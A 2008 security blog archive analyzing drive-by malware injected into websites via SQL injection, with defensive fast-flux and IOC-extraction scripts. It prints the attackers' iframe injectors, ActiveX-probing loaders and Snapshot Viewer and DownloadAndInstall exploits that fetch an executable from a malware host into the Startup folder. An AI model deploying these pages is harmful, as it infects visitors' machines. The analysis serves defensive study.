Archive for July, 2008

www.worldofwarcrokft.com/jj.js

Posted in sql injection on July 31, 2008 by s3cu

jj.js essentially writes an iframe whose src is ‘http://www.worldofwarcrokft.com/1/index.htm’.
index.htm is 8-bit ASCII encoded; the hexdump of its content is as follows:


*/js.js and */jj.js

Posted in sql injection on July 31, 2008 by s3cu

Has the old wave of attacks died down?

Have attacks injecting these */js.js and */jj.js malicious scripts taken over?

analysis of www.h23f.ru/ngg.js

Posted in sql injection on July 26, 2008 by s3cu

This injected script writes an iframe whose src is http://iroe.ru/cgi-bin/index.cgi?ad

www.o1o2qq.cn/ri.js

Posted in sql injection on July 22, 2008 by s3cu

Another injected script src.
The script redirects to a different URL depending on whether the browser's language is set to Chinese, so it has to be fetched with both language settings to see every target.
Content as follows:

www.liwejr.cn/c4.htm?b029

Posted in sql injection on July 22, 2008 by s3cu

This injected iframe src loads go.html.

go.html in turn loads exploits from user1.date-21.net.

Contents of go.html as follows:

*/ngg.js (update 2)

Posted in sql injection on July 18, 2008 by s3cu

More *.ru domains.

Surfing to the main page of, say, http://www.nudk.ru, the website of Cash-Transfers Inc. appears.

Compare "dig www.iogp.ru" with "dig www.cashtransfers.tk":

;; ANSWER SECTION:
www.iogp.ru.        200    IN    A    76.73.139.26
www.iogp.ru.        200    IN    A    81.109.236.138
www.iogp.ru.        200    IN    A    98.14.3.126
www.iogp.ru.        200    IN    A    71.62.120.230
www.iogp.ru.        200    IN    A    76.30.118.52
www.iogp.ru.        200    IN    A    24.20.116.38
www.iogp.ru.        200    IN    A    74.128.165.226
www.iogp.ru.        200    IN    A    76.118.74.21
www.iogp.ru.        200    IN    A    24.86.16.225
www.iogp.ru.        200    IN    A    65.96.41.17
www.iogp.ru.        200    IN    A    70.79.211.89
www.iogp.ru.        200    IN    A    76.199.17.243
www.iogp.ru.        200    IN    A    123.195.179.249
www.iogp.ru.        200    IN    A    194.44.214.81
www.iogp.ru.        200    IN    A    71.228.191.159

;; ANSWER SECTION:
www.cashtransfers.tk.    600    IN    A    194.44.214.81
www.cashtransfers.tk.    600    IN    A    76.30.118.52
www.cashtransfers.tk.    600    IN    A    71.228.191.159
www.cashtransfers.tk.    600    IN    A    65.96.41.17
www.cashtransfers.tk.    600    IN    A    81.109.236.138
www.cashtransfers.tk.    600    IN    A    76.199.17.243
www.cashtransfers.tk.    600    IN    A    89.139.15.213
www.cashtransfers.tk.    600    IN    A    74.128.165.226
www.cashtransfers.tk.    600    IN    A    76.73.139.26
www.cashtransfers.tk.    600    IN    A    76.118.74.21
www.cashtransfers.tk.    600    IN    A    71.62.120.230
www.cashtransfers.tk.    600    IN    A    70.79.211.89
www.cashtransfers.tk.    600    IN    A    24.20.116.38
www.cashtransfers.tk.    600    IN    A    79.87.139.200
www.cashtransfers.tk.    600    IN    A    98.14.3.126

Thirteen of the fifteen addresses are shared between the two names, both TTLs are short (200 and 600 seconds) and the addresses are scattered across a dozen unrelated /8 ranges rather than one hosting provider's block: the same fast-flux pool is fronting both the injected *.ru domains and the "Cash Transfers" site. What is Cash Transfers Inc.? Maybe this spam mail can give some clue…
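The comparison above can be automated. The following is an added example and not part of the original post: it parses two dig answer sections (the record lines are copied from the output above) into address pools, reports what the two names share and how many distinct /8 ranges the union spans, and applies a fast-flux heuristic whose thresholds are illustrative assumptions, not a standard.

```javascript
// Added example (not from the original post): parse dig(1) answer sections
// and compare the address pools behind two names. The two record sets below
// are copied from the post's dig output; the thresholds in looksFastFlux are
// illustrative heuristics, not a standard.

const IOGP_ANSWER = `
;; ANSWER SECTION:
www.iogp.ru.        200    IN    A    76.73.139.26
www.iogp.ru.        200    IN    A    81.109.236.138
www.iogp.ru.        200    IN    A    98.14.3.126
www.iogp.ru.        200    IN    A    71.62.120.230
www.iogp.ru.        200    IN    A    76.30.118.52
www.iogp.ru.        200    IN    A    24.20.116.38
www.iogp.ru.        200    IN    A    74.128.165.226
www.iogp.ru.        200    IN    A    76.118.74.21
www.iogp.ru.        200    IN    A    24.86.16.225
www.iogp.ru.        200    IN    A    65.96.41.17
www.iogp.ru.        200    IN    A    70.79.211.89
www.iogp.ru.        200    IN    A    76.199.17.243
www.iogp.ru.        200    IN    A    123.195.179.249
www.iogp.ru.        200    IN    A    194.44.214.81
www.iogp.ru.        200    IN    A    71.228.191.159
`;

const CASH_ANSWER = `
;; ANSWER SECTION:
www.cashtransfers.tk.    600    IN    A    194.44.214.81
www.cashtransfers.tk.    600    IN    A    76.30.118.52
www.cashtransfers.tk.    600    IN    A    71.228.191.159
www.cashtransfers.tk.    600    IN    A    65.96.41.17
www.cashtransfers.tk.    600    IN    A    81.109.236.138
www.cashtransfers.tk.    600    IN    A    76.199.17.243
www.cashtransfers.tk.    600    IN    A    89.139.15.213
www.cashtransfers.tk.    600    IN    A    74.128.165.226
www.cashtransfers.tk.    600    IN    A    76.73.139.26
www.cashtransfers.tk.    600    IN    A    76.118.74.21
www.cashtransfers.tk.    600    IN    A    71.62.120.230
www.cashtransfers.tk.    600    IN    A    70.79.211.89
www.cashtransfers.tk.    600    IN    A    24.20.116.38
www.cashtransfers.tk.    600    IN    A    79.87.139.200
www.cashtransfers.tk.    600    IN    A    98.14.3.126
`;

// Parse the A records of one answer section into { name, ttl, addrs }.
function parseARecords(digOutput) {
  const re = /^(\S+)\s+(\d+)\s+IN\s+A\s+(\d{1,3}(?:\.\d{1,3}){3})$/;
  const rec = { name: null, ttl: null, addrs: new Set() };
  for (const raw of digOutput.split('\n')) {
    const line = raw.trim();
    if (!line || line.startsWith(';')) continue;   // blank lines and dig comments
    const m = re.exec(line);
    if (!m) continue;                              // not an A record (CNAME, NS, ...)
    rec.name = rec.name || m[1];
    rec.ttl = Number(m[2]);
    rec.addrs.add(m[3]);
  }
  return rec;
}

// Compare two pools: overlap, addresses unique to each side, Jaccard similarity,
// and how many distinct /8 ranges the union spans (a cheap proxy for "unrelated networks").
function comparePools(a, b) {
  const shared = [...a.addrs].filter(ip => b.addrs.has(ip));
  const onlyA = [...a.addrs].filter(ip => !b.addrs.has(ip));
  const onlyB = [...b.addrs].filter(ip => !a.addrs.has(ip));
  const union = new Set([...a.addrs, ...b.addrs]);
  const slash8s = new Set([...union].map(ip => ip.split('.')[0]));
  return { shared, onlyA, onlyB, jaccard: shared.length / union.size, slash8s: slash8s.size };
}

// Heuristic flag: many A records, low TTL, spread over many /8s, and a pool
// largely shared with the other name. Thresholds are illustrative assumptions.
function looksFastFlux(a, b) {
  const c = comparePools(a, b);
  return a.addrs.size >= 10 && b.addrs.size >= 10 &&
         a.ttl <= 600 && b.ttl <= 600 &&
         c.slash8s >= 5 && c.jaccard >= 0.5;
}

// Stand-alone run prints a one-line summary.
const iogp = parseARecords(IOGP_ANSWER);
const cash = parseARecords(CASH_ANSWER);
const cmp = comparePools(iogp, cash);
console.log(`${iogp.name} and ${cash.name}: ${cmp.shared.length} shared addresses, ` +
            `Jaccard ${cmp.jaccard.toFixed(2)}, ${cmp.slash8s} distinct /8s, ` +
            `fast-flux-like: ${looksFastFlux(iogp, cash)}`);
```

To use it on live data, paste the answer sections of two dig runs into the two constants; pointing dig at several resolvers a few minutes apart and diffing the pools over time is the stronger test, since a fast-flux name rotates its addresses while a legitimate round-robin pool stays put.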

www.eoai114.cn and user1.jzm010.cn

Posted in Uncategorized on July 17, 2008 by s3cu

malicious content here…

Content of index.html. On load it clears the status bar, then sets a "play" cookie valid for 24 hours so the browser-specific iframe is written only once per victim (an analyst re-fetching the page with the same cookie jar sees none of it). Inside that gate it picks ilink.html for MSIE and flink.html for any other browser; outside the gate it unconditionally appends a third iframe to www.dxp008.cn/b2.htm, with the slashes escaped as \/ so a naive grep for "http://" misses it:
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://user1.jzm010.cn/ilink.html width=100 height=0></iframe>");
}
else{document.write("<Iframe src=http://user1.jzm010.cn/flink.html width=100 height=0></iframe>");}
}
document.writeln("<Iframe src=http:\/\/www.dxp008.cn\/b2.htm width=50 height=0><\/iframe>")

Content of aa2.htm?20. Three iframes (14.htm, fx.htm, ac.htm) are loaded unconditionally. The script that follows is lightly obfuscated (bracket notation such as window["Date"], random identifier names, an unused variable named kaspersky) and is gated by a 3-hour Cookie1 cookie. Inside the gate it probes for ActiveX controls with new ActiveXObject(progid) inside try/catch, so an exploit page is only loaded when the matching control is installed: GLIEDown.IEDown.1 and GLCHAT.GLChatCtrl.1 are Xunlei (Thunder) controls and IERPCtl.IERPCtl.1 is RealPlayer's, all common on Chinese-language desktops. The RealPlayer check appears twice with two different exploit pages (real11.htm and real10.htm). The trailing js.users.51.la script is a visitor counter that gives the operator hit statistics:
<Iframe src="http://user1.jzm010.cn/14.htm" width=100 height=0></iframe>
<Iframe src="http://user1.jzm010.cn/fx.htm" width=100 height=0></iframe>
<Iframe src="http://user1.jzm010.cn/ac.htm" width=100 height=0></iframe>
<script>
var kaspersky="woyaofa"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
try{if(new window["ActiveXObject"]("GLIEDown.IEDown.1"))window["document"]["write"]('<iframe style=display:none src="http://user1.jzm010.cn/newlz.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="http://user1.jzm010.cn/real11.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="http://user1.jzm010.cn/real10.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://user1.jzm010.cn/lz.htm"></iframe>');}catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1812235.js"></script>

Let’s follow one of the links, user1.jzm010.cn/ac.htm:

<html><object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="obj"></object>
<script language="javascript">
var buf1 = "http://dddd.nihao69.cn/down/ko.exe";
var buf2 = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/qq.exe";
obj.SnapshotPath = buf1;obj.CompressedPath = buf2;obj.PrintSnapshot();
</script></html>
<Iframe src="http://user1.jzm010.cn/ce.htm" width=100 height=0></iframe>

What’s this? It is exploiting the Microsoft Access Snapshot Viewer ActiveX control (snapview.ocx, the CLSID above) to download a trojan: SnapshotPath names the remote file, CompressedPath the local destination, and PrintSnapshot() performs the copy without any prompt. The destination is the All Users Startup folder (「开始」菜单/程序/启动 is "Start Menu/Programs/Startup" on Chinese Windows), so ko.exe, saved as qq.exe, runs at the next logon of any user. When this was posted the bug was unpatched and covered by Microsoft Security Advisory 955179; it was fixed in MS08-041 (CVE-2008-2463), and until the patch the only mitigation was setting the kill bit on this CLSID.

Let’s follow another link, user1.jzm010.cn/ce.htm:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2900.3354" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1="http://dddd.nihao69.cn/down/ko.exe";
install["DownloadAndInstall"](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>

What is this CLSID? It could be another new exploit. Whatever the control is, it exposes a DownloadAndInstall method that takes a URL, which is all the page needs to fetch the same ko.exe. To identify an unknown CLSID on a Windows host, query the registry: reg query "HKCR\CLSID\{78ABDC59-D8E7-44D3-9A76-9A0918C52B4A}" /s lists the ProgID and the InprocServer32 DLL that implements it, which tells you which product (and which vendor's patch or kill bit) is involved.
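The pages quoted in this post (index.html and aa2.htm above, and the ac.htm and ce.htm exploit pages) can be triaged without running them. The block below is an added example and not code from the original post: a static indicator extractor that pulls iframe targets, probed ActiveX ProgIDs, OBJECT CLSIDs, the download methods that get called and .exe payload URLs out of the raw text with regular expressions, after undoing the http:\/\/ escaping. SAMPLE is constructed from fragments of those pages; the regular expressions and the list of method names are my own assumptions about what is worth flagging.

```javascript
// Added example, not code from the original post: a static IOC extractor for
// injected pages like the ones quoted above (index.html, aa2.htm, ac.htm,
// ce.htm). It never evaluates the script; it pulls iframe targets, probed
// ActiveX ProgIDs, OBJECT CLSIDs, dangerous method calls and .exe payload
// URLs out of the raw text. SAMPLE is constructed from fragments of those
// pages; String.raw keeps the backslashes exactly as the malware wrote them.

const SAMPLE = String.raw`
document.write("<Iframe src=http://user1.jzm010.cn/ilink.html width=100 height=0></iframe>");
document.writeln("<Iframe src=http:\/\/www.dxp008.cn\/b2.htm width=50 height=0><\/iframe>")
<Iframe src="http://user1.jzm010.cn/14.htm" width=100 height=0></iframe>
try{if(new window["ActiveXObject"]("GLIEDown.IEDown.1"))window["document"]["write"]('<iframe style=display:none src="http://user1.jzm010.cn/newlz.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="http://user1.jzm010.cn/real11.htm"></iframe>');}catch(e){}
<object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="obj"></object>
var buf1 = "http://dddd.nihao69.cn/down/ko.exe";
obj.SnapshotPath = buf1;obj.CompressedPath = buf2;obj.PrintSnapshot();
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
var YEtYcJsR1="http://dddd.nihao69.cn/down/ko.exe";
install["DownloadAndInstall"](YEtYcJsR1);
`;

// Undo the "http:\/\/" trick that keeps plain greps for "http://" from matching.
function unescapeSlashes(text) {
  return text.replace(/\\\//g, '/');
}

// Return sorted, de-duplicated indicator lists found in the page text.
function extractIocs(text) {
  const t = unescapeSlashes(text);
  const collect = (re, pick = m => m[1]) => {
    const out = new Set();
    for (const m of t.matchAll(re)) out.add(pick(m));
    return [...out].sort();
  };
  return {
    // <iframe src=...>: quoted or bare, any case, src in any attribute position
    iframes:  collect(/<iframe\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi),
    // new ActiveXObject("ProgID") and the obfuscated new window["ActiveXObject"]("ProgID")
    progids:  collect(/ActiveXObject["'\]]*\s*\(\s*["']([\w.]+)["']/g),
    // <object classid=clsid:GUID>, normalised to upper case for lookup
    clsids:   collect(/classid\s*=\s*["']?clsid:([0-9a-f-]{36})/gi, m => m[1].toUpperCase()),
    // method names (seen on this page) that write a remote file to disk when called,
    // matched whether invoked as obj.Method( or obj["Method"](
    methods:  collect(/\b(PrintSnapshot|DownloadAndInstall)\b["'\]]*\s*\(/g),
    // anything fetched over HTTP that ends in .exe
    payloads: collect(/https?:\/\/[^\s"'<>()]+\.exe\b/gi, m => m[0]),
  };
}

// Stand-alone run prints the extracted indicators as JSON.
console.log(JSON.stringify(extractIocs(SAMPLE), null, 2));
```

Run the extractor over every page in the chain (each iframe target it finds is the next page to fetch), and remember that the pages themselves are cookie- and browser-gated, so fetch them with a fresh cookie jar and an MSIE user agent or the extractor has nothing to work on.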